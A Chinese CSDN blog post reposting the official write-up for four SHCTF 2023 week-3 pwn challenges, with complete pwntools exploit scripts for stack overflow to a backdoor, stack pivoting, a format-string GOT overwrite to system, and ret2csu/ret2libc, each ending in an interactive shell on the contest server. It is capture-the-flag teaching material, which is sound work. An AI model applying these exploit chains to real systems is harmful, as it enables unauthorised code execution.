SHCTF 2023 [WEEK 3] PWN

最新推荐文章于 2024-06-23 12:10:55 发布
最新推荐文章于 2024-06-23 12:10:55 发布
阅读量288 收藏
点赞数 7
分类专栏: PWN 文章标签: 网络安全 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xzzzz911/article/details/134214046
版权

简介:

最后一周的题直接上强度了,有点受不了T^T,先转载官方的WP吧,后续琢磨透了再来改

call_call_would_backdoor

exp如下:

from pwn import*

p=remote('112.6.51.212',31696 )
context(arch='amd64',log_level = 'debug',os = 'linux')
#p=process('./bac')
#p=gdb.debug('./bac')
elf=ELF('./bac')


ladd=elf.symbols['backd00r']
print("%x"%ladd)
p1=b'a'*(0x48+4)+p32(ladd)
p.sendafter("?",p1)


p2="MTEwL2Jpbi9zaA=="
p.sendafter("!",p2)

#p.sendlineafter(":",p1)


#send
p.interactive()

transfer

程序没开pie保护,能够通过静态调试得到全局变量地址,第一次输入0xc8字节大小数据进入data段,显然足够大,第二次输入只溢出0x10字节,足够进行栈迁移了,此外程序system函数已经给出

exp如下:

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
#io = process('./transfer')
io = remote('112.6.51.212', 32178)
elf = ELF('./transfer')
#libc = ELF('libc-2.31.so')

target_addr = 0x405160-0x8
bin_sh_addr = 0x405160+0x18
pop_rdi_ret = 0x0000000000401313
leave_ret = 0x00000000004012a7
ret = 0x000000000040101a

#gdb.attach(io)
#pause()
payload = p64(pop_rdi_ret)
payload += p64(bin_sh_addr)
payload += p64(elf.plt['system'])
payload += b'/bin/sh\x00'
io.recvuntil("haha,welcome!")
io.send(payload)

payload = b'a'*8
payload += p64(target_addr)
payload += p64(leave_ret)
io.recvuntil("input:")
io.send(payload)

io.interactive()

Aftermath

套了三个知识点

Trail1用ctypes模拟c语言函数,输入随机值绕过

Trail2查看它判断负数的方式是检查’-’,那么我们利用整数溢出,输入两个大于INT_MAX的值即可绕过

Trail3就是普通的格式化字符串修改printf_got为system

exp如下:

from pwn import *
from ctypes import *
from struct import pack
context(os='linux', arch='amd64', log_level='debug')
native = 1

if native:
   p = process('pwn1')
   libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
   p = remote('')


def debug():
   gdb.attach(p)
   pause()


def get_addr():
   return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))


se = lambda data: p.send(data)
sa = lambda delim, data: p.sendafter(delim, data)
sl = lambda data: p.sendline(data)
sla = lambda delim, data: p.sendlineafter(delim, data)
sea = lambda delim, data: p.sendafter(delim, data)
rc = lambda numb=4096: p.recv(numb)
rl = lambda: p.recvline()
ru = lambda delims: p.recvuntil(delims)
su = lambda delim, data: success(delim + hex(data))

elf = ELF('pwn1')

def test1():
   libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
   srand = libc.srand(libc.time(0))
   x = libc.rand()
   y = (x+1919810)^114514
   sl(str(y))

def test2():
   v1 = 2147483647+200
   v2 = v1 - 100
   sla("v1:\n", str(v1))
   sla("v2:\n", str(v2))

def test3():
   libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
   offset = 6
   payload1 = b'%15$p'
   sla(b'gift\n', payload1)
   write_addr = int(p.recv(14).decode(),16)-23
   libc_base = write_addr - libc.sym['write']
   su("libc_base:",libc_base)
   system = libc_base + libc.sym['system']
   su("system:",system)
   system1 = (system & 0xffffff)>>16
   system2 = (system&0xffff)
   su("system1:",system1)
   su("system2:",system2)
   payload2 = b'%'+str(system1).encode()+b'c%10$hhn'
   payload2 += b'%' + str(system2-system1).encode()+b'c%11$hn'
   print(len(payload2))
   payload2 += b'a'*(32-len(payload2))
   payload2 += p64(elf.got['printf']+2) + p64(elf.got['printf'])
   sl(payload2)
   sl(b'/bin/sh\x00')

test1()
test2()
test3()

p.interactive()

Start Your PWN!

read 函数可溢出

ida 看到 libc 初始化片段__libc_csu_init 可用,我们可以通过 payload 布局 csu 片段

write 函数已经执行过,可泄露真实地址,从而利用它获取 libc 版本

ida 可以得到 write 和 main 的地址

ropgadget 获取可用片段

exp如下:

from pwn import *
# p=process('./pwn')
p = remote('112.6.51.212',30082)
libc=ELF('libc-2.31.so')

write_got=0x601018
main_addr=0x400699
pop_addr=0x40076A
mov_addr=0x400750

pop_rdi=0x400773
ret=0x400506

payload=b'a'*0x108+p64(pop_addr)+p64(0)+p64(1)+p64(write_got)+p64(1)+p64(write_got)+p64(8)+p64(mov_addr)+b'a'*(0x8+8*6)+p64(main_addr)
p.recvuntil('Please:\n')
p.sendline(payload)
write_addr=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
success(hex(write_addr))

libc_base=write_addr-libc.sym['write']
sys=libc_base+libc.sym['system']
binsh=libc_base+next(libc.search(b"/bin/sh\x00"))

payload=b'a'*0x108+p64(ret)+p64(pop_rdi)+p64(binsh)+p64(sys)
p.recvuntil('Please:\n')
p.sendline(payload)
p.interactive()

总结:

做的不知所措,云里雾里,还得继续加油!!!

Xzzzz911
关注
  • 7
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SHCTF 2023 [WEEK 2] PWN
Xzzzz911的博客
11-01 508
第二周对比第一周难度提高了些,开始要熟悉做pwn的技巧手法了,有些东西不是很好理解,其他佬的WP也没有详细的解释,都默认是常识,弄得我云里雾里,还得多做题目,自己总结,加油加油!!!
SHCTF 2023 [WEEK 1] PWN
Xzzzz911的博客
10-31 492
SHCTF-"山河"网络安全技能挑战赛 是由齐鲁工业大学、西安邮电大学、广东海洋大学、长春工程学院、郑州轻工业大学、河南大学、齐鲁师范学院、陕西邮电职业技术学院、陕西工业职业技术学院、商丘师范学院、咸阳师范学院 (排名不分先后)等十所高校共同举办的 CTF比赛, 完结撒花!!!这次比赛收获很大,新生赛往往会让你收获意想不到的知识点,挺好的,人民的好比赛,支持支持,明年再来 -_- ,接下来会把比赛分周分享记录下来。
[SHCTF 2023 校外赛道] pwn
weixin_52640415的博客
10-30 316
有19道题这么多,不过基本是入门题,都是在骗新生,看这么容易快来PWN吧!
SHCTF2023-校外赛道WP部分
Aluxian_的博客
10-30 1885
SHCTF2023-校外赛道WP部分 由于刚接触CTF没多久 还是属于萌新级别的也没怎么打过比赛记录一下学习的过程大佬绕过即可,后续会继续加油努力。
[SHCTF 2023 校外赛道] reverse
weixin_52640415的博客
10-31 624
想不到第1题是个汇编,咱也不知道拿啥能弄成c,不过这题也不难,直接能看懂,关键部分。取出异或0x1e然后保存,再取出-0xa再保存。
SHCTF2023-校外赛道
Fab1an的博客
10-30 422
taoCMS是一个完善支持多数据库(Sqlite/Mysql)的CMS网站内容管理系统,是国内最小的功能完善的基于php+SQLite/Mysql的CMS。体积小(仅180Kb)速度快,包含文件管理、数据采集、Memcache整合、用户管理等强大功能,跨平台运行,支持SAE、BAE云服务,阿里云虚拟主机。代码手写采用严格的数据过滤,保证服务器的安全稳定!
SHCTF(山河)赛事部分Write up-白猫
m0_73734159的博客
10-30 790
2023SHCTF(山河)赛事部分Write up-白猫
[NewStarCTF 2023] web题解
热门推荐
rev1ve的博客
10-16 1万+
分析一下,第一个if语句判断条件为上传的password参数的MD5值前六位为c4d038;和反引号去绕过对system函数的过滤,反斜杠绕过flag,tac替换cat命令。(多次尝试,发现回显的位置在5而不是1,开始卡了很久没回显)简单的文件包含,这里过滤了常见的转换过滤器base和rot。打开题目,发现是小游戏(题目跟最近打的SHCTF比较像)我们丢到重放器,发现是页面302状态,并且出现了提示。(这里用XFF不行,我用的是X-Real-IP)打开题目,提示我们传参两个数,然后帮我们计算。
[SHCTF-校外赛道]61名
liaochonxiang的博客
10-31 163
将Java代码copy下来,在下面两处修改一下,将密文和密钥输出。在存放输入数据的内存处打个断点,进行AES加密时会断下。通过观察汇编,得知这是一个AES+base64组合加密。SMC题,可以动调解密,或者自己写个idc脚本。动调,输入42位数,修改跳转,得到key。动调到ArgList未与input运算前。动调,将每层的迷宫打出来,然后跑脚本。提取其中的数据,有点misc的味道了。当内存变化时,可以得到key的切片。接下来就是动调,判断切片的情况。重点在于AES的key和iv。
TIM3_PWN呼吸灯.zip
10-12
STM32通用定时器实现呼吸灯,PWM又称脉宽调制,是利用微处理器的数字输出来对模拟电路进行控制的一种非常有效的技术。
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN输出占空比可变的方波。
2024NKCTF-pwn
03-25
2024NKCTF_pwn
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8301
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&Kerberos&委派安全&非约束系&约束系&RBCD资源系&Spooler利用
最新发布
HACKONE的博客
06-23 154
机器A(域控)访问具有非约束委派权限的机器B的服务,会把当前认证用户(域管用户)的的TGT放在ST票据中,一起发送给机器B,机器B会把TGT存储在lsass进程中以备下次重用。简而言之,非约束委派是指用户账户将自身的TGT转发给服务账户使用。委派是一种域内应用模式,是指将域内用户账户的权限委派给服务账号,服务账号因此能以用户的身份在域内展开活动(请求新的服务等),类似于租房中介房东的关系去理解。攻击者拿到了一台配置非约束委派的机器权限,可以诱导域管来访问该机器,然后得到管理员的TGT,从而模拟域管用户。
【安全】Linux Fanotify使用入门
追寻梦想的青春
06-19 905
fanotify是另一种文件监控机制,在使用上两者类似,都是先调用init函数初始化句柄,然后调用类似watch的函数添加监控路径,再使用select+read的方式读取出变化的事件,根据事件中给出的参数获取文件的路径、事件类型以及其他需要的数据。如果是监控主机上的路径,directed结合FAN_EVENT_ON_CHILD标志就只能监控目录以及目录下的文件,per-mount可以监控pathname所在的挂载点中所有文件或者目录的变化,而global模式可以监控整个文件系统。
企业防盗版,如何保障上网安全
shenxinda_lu的博客
06-20 351
当需要访问互联网时,用户在隔离沙盒内进行操作,确保主机与互联网物理隔离,只有沙盒能够访问互联网,且沙盒与本机隔离。
NewStarCTF2023week3
10-20
NewStarCTF2023week3是一场CTF比赛,其中包含了各种类型的题目,例如Web、Crypto、Pwn等等。其中,引用和引用是该比赛中的两道题目的flag,而引用则是一篇关于该比赛中Crypto题目chaos的Writeup。如果你对CTF比赛感...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值